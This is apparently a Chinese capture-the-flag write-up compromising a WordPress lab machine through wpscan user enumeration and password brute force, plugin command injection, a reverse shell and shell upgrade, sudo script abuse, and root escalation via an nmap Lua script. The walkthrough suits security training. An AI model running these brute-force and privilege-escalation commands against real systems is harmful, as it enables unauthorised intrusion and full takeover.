扫描获取靶机ip
扫描开放的端口服务
开了22还有80端口,访问80端口,是一个wordpress搭建的站(这里需要绑定域名才能正常访问)
wpscan扫描一下
没有发现什么漏洞,看看扫一下用户名然后爆破看看能不能行
wpscan --url http://wordy/ -e u
扫出来5个用户名,这里用top500没有爆破出来密码,搜了一下wp没想到这个靶机还有提示
使用提示的命令生成一个密码字典
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
再把那五个用户名保存下来,有wpscan爆破一下密码
wpscan --url http://wordy/ -U user.txt -P passwords.txt
访问wp-admin页面,使用爆破出来的用户密码登录
这里有一个插件是由漏洞的
输入框那里有输入限制,f12改一下输入限制长度
成功执行命令
尝试反弹shell
获取交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
去home目录下找一下那几个用户目录下有什么东西,在mark目录下发现一个txt文件
应该是一个备忘录之类的,记载了graham用户的密码,ssh试试能不能登录
成功登录graham用户,发现可以使用jens身份无密码执行这个文件
查看这个文件
修改一下这个文件,加入/bin/bash
没办法用vi编辑器修改,使用echo命令往文件里面追加内容
echo "/bin/bash" >>/home/jens/backups.sh
使用jens身份执行这个文件,成功切换到jens用户
sudo -l查看,看到这个用户可以使用root身份无密码执行nmap命令
上网搜索一下nmap提权
echo "os.execute('/bin/bash')" >> rootl
sudo nmap --script=rootl
这里只有切换到~目录才有权限执行
这里发现在输入的时候上面是不显示输入的内容的,输入完命令后直接执行就好,成功查看到flag
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。